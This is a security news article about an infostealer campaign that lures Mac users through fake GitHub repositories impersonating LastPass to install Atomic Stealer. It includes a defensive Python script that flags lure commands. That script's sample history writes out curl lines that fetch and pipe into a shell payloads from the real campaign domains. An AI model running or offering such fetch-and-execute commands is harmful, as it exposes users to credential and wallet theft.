The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team has issued a warning about an ongoing infostealer campaign that specifically targets Mac users through fraudulent GitHub repositories. The campaign leverages Search Engine Optimization (SEO) poisoning to lure victims into downloading malicious payloads disguised as legitimate software.
The attackers are setting up fake GitHub repositories impersonating major tech companies, financial institutions, and even password managers like LastPass. These repositories appear in top search engine results due to aggressive SEO tactics.
LastPass explains, “Two GitHub pages impersonating LastPass were posted to GitHub by the user ‘modhopmduck476’ on 16 September. Both pages included links allegedly to ‘Install LastPass on MacBook’ that redirected to the same page.”
The fraudulent GitHub pages featured Mac-related keywords such as “MacOS,” “Mac,” and “Premium on MacBook” to improve their visibility and credibility in search results.
The campaign involves a multi-stage redirection flow designed to trick users into running malicious commands:
- Victims click on fraudulent GitHub repositories masquerading as LastPass installers.
- The repositories redirect them to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
- From there, they are redirected again to macprograms-pro[.]com/mac-git-2-download.html.
- This site instructs users to paste a curl command into the Mac Terminal; the command fetches a URL that is supplied in Base64-encoded form.
- The decoded URL (bonoud[.]com/get3/install.sh) delivers a payload labeled “Update” into the Temp directory.
Despite its innocent name, this “Update” file is actually Atomic Stealer (AMOS malware). The report confirms, “The Update payload is in fact Atomic stealer (aka AMOS malware). Atomic stealer has been available since at least April 2023. The malware has previously been associated with financially motivated cybercrime groups.”
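The redirection flow above gives a defender two things to look for on a Mac fleet: the domains the report names, and the shape of the lure itself (a curl command whose target is hidden behind base64 decoding, or whose output is piped straight into a shell). The script below is an added example written for this article, not code from LastPass or the TIME team. It takes the three domains quoted in the report as its indicator set, defines a few heuristics for the paste-into-Terminal pattern, and runs them over a handful of constructed shell-history lines; the base64 token in the sample is generated inline from the decoded URL the report gives, so nothing here depends on a live site.

```python
import base64
import re

# Indicators quoted in the LastPass report (the page defangs them with [.]; undefanged here for matching).
CAMPAIGN_DOMAINS = {
    "ahoastock825.github.io",
    "macprograms-pro.com",
    "bonoud.com",
}

# Heuristics for the lure described in the report: a curl invocation combined with
# base64 decoding, or curl output piped directly into a shell. These patterns are
# this example's own assumptions, not rules published by LastPass.
CURL_RE = re.compile(r"\bcurl\b")
B64_DECODE_RE = re.compile(r"base64\s+(-d|--decode|-D)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|zsh)\b")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_urls(line):
    """Return every http(s) URL that is hidden inside a base64-looking token on the line."""
    found = []
    for token in B64_TOKEN_RE.findall(line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
            continue
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def classify(line):
    """Return the list of reasons a line is suspicious; an empty list means it is clean."""
    reasons = []
    lowered = line.lower()
    for domain in sorted(CAMPAIGN_DOMAINS):
        if domain in lowered:
            reasons.append(f"known campaign domain {domain}")
    for url in decoded_urls(line):
        host = url.split("//", 1)[1].split("/", 1)[0].lower()
        if host in CAMPAIGN_DOMAINS:
            reasons.append(f"base64-hidden URL to campaign domain {host}")
        else:
            reasons.append(f"base64-hidden URL {url}")
    if CURL_RE.search(line) and B64_DECODE_RE.search(line):
        reasons.append("curl combined with base64 decoding")
    if CURL_RE.search(line) and PIPE_TO_SHELL_RE.search(line):
        reasons.append("curl output piped into a shell")
    return reasons


def scan(lines):
    """Map each flagged line to its reasons; lines that trip no check are omitted."""
    results = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            results[line] = reasons
    return results


# Constructed sample shell history. Line 3 mirrors the lure the report describes:
# the decoded URL from the report is base64-encoded here so the sample is self-contained.
HIDDEN = base64.b64encode(b"https://bonoud.com/get3/install.sh").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git clone https://github.com/example/legit-tool.git",
    f"curl -fsSL $(echo {HIDDEN} | base64 -d) -o /tmp/Update",
    "curl -fsSL https://macprograms-pro.com/mac-git-2-download.html | sh",
    "brew install --cask some-app",
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_HISTORY).items():
        print(f"FLAGGED: {line}")
        for reason in reasons:
            print(f"    - {reason}")
```

In practice the same `classify` function can be pointed at `~/.zsh_history`, an EDR's process-command-line telemetry, or a proxy log, with the domain set extended as new impersonation repositories are reported. The base64 check matters because a plain domain blocklist never sees the target host of the first lure line; only after decoding does it resolve to a known campaign domain.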
Atomic Stealer is a notorious Mac-focused infostealer capable of exfiltrating:
- Passwords and authentication data
- Wallets and cryptocurrency information
- Browser-stored credentials
- System metadata
By using GitHub and SEO to distribute malware, attackers are cleverly exploiting the trust users place in well-known platforms and top-ranked search results.
LastPass confirms that “the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware. The threat actors are using Search Engine Optimization (SEO) to deliver links to their malicious sites at the top of search pages, including Bing and Google.”
The TIME team has already submitted takedown requests for the fraudulent GitHub pages, which are now inactive, but warns that similar impersonations will likely reappear. They stress the importance of verifying download sources and cross-checking software installers against official vendor sites.